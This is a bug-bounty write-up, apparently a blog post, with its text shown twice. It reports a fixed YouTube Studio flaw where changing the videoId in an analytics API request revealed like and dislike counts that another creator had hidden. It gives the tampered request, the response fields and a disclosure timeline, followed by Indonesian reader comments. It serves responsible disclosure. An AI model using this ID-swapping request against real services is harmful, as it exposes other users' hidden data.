Steps to reproduce:
Victim:
1. Upload video.
2. Edit video.
3. Show how many viewers like and dislike this video ---> Don't show how many viewers like and dislike this video.
4. Save.
Attacker:
1. Go to YouTube Studio
2. Video analytics.
Request:
[POST] https://studio.youtube.com/youtubei/v1/analytics_data/get_cards?alt=json&key=...
{"entity":{"videoId":"your_video_id"} ---> {"entity":{"videoId":"victim_video_id"}
Response:
"metrics": {"viewCount": "victim_video_viewCount", "commentCount": "victim_video_commentCount", "likeCount": "victim_video_likeCount", "dislikeCount": "victim_video_dislikeCount"}
Will show the likes and dislikes count even though is hidden by victim.
PoC video: https://youtu.be/plwv_2pDApk
Timeline:
mm/dd/yyyy
02/13/2021 - Bug Found
02/13/2021 - Submit Report
02/17/2021 - Triaged
Status: New - Assigned
Priority: P4 - P2
02/23/2021 - Won't Fix (Not Reproducible)
Status: Assigned - Won't Fix (Not Reproducible)
02/24/2021 - Reopened
Status: Won't Fix (Not Reproducible) - Assigned
02/25/2021 - Won't Fix (Not Reproducible)
Status: Assigned - Won't Fix (Not Reproducible)
03/04/2021 - Reopened
Status: Won't Fix (Not Reproducible) - Assigned
03/04/2021 - Accepted
Status: Assigned - Accepted
Severity: S4 - S2
Type: Customer Issue - Bug
03/10/2021 - Bounty awarded by Google VRP.
03/26/2021 - Fixed
LinkedIn: Alessandro Rumampuk
YouTube: R,ando
Facebook: Ando
Twitter: R ando
1. Upload video.
2. Edit video.
3. Show how many viewers like and dislike this video ---> Don't show how many viewers like and dislike this video.
4. Save.
1. Go to YouTube Studio
2. Video analytics.
Request:
[POST] https://studio.youtube.com/youtubei/v1/analytics_data/get_cards?alt=json&key=...
{"entity":{"videoId":"your_video_id"} ---> {"entity":{"videoId":"victim_video_id"}
Response:
"metrics": {"viewCount": "victim_video_viewCount", "commentCount": "victim_video_commentCount", "likeCount": "victim_video_likeCount", "dislikeCount": "victim_video_dislikeCount"}
Will show the likes and dislikes count even though is hidden by victim.
PoC video: https://youtu.be/plwv_2pDApk
Timeline:
mm/dd/yyyy
02/13/2021 - Bug Found
02/13/2021 - Submit Report
02/17/2021 - Triaged
Status: New - Assigned
Priority: P4 - P2
02/23/2021 - Won't Fix (Not Reproducible)
Status: Assigned - Won't Fix (Not Reproducible)
02/24/2021 - Reopened
Status: Won't Fix (Not Reproducible) - Assigned
02/25/2021 - Won't Fix (Not Reproducible)
Status: Assigned - Won't Fix (Not Reproducible)
03/04/2021 - Reopened
Status: Won't Fix (Not Reproducible) - Assigned
03/04/2021 - Accepted
Status: Assigned - Accepted
Severity: S4 - S2
Type: Customer Issue - Bug
03/10/2021 - Bounty awarded by Google VRP.
03/26/2021 - Fixed
LinkedIn: Alessandro Rumampuk
YouTube: R,ando
Facebook: Ando
Twitter: R ando
Berapa bountynya bang? P berapa tingkat keparahan bugnya?
ReplyDeleteDampaknya apa gan?
ReplyDeletePenyerang dapat melihat jumlah suka dan tidak suka, padahal korban sudah menyetel jumlah suka dan tidak suka pada video untuk tidak diperlihatkan.
Delete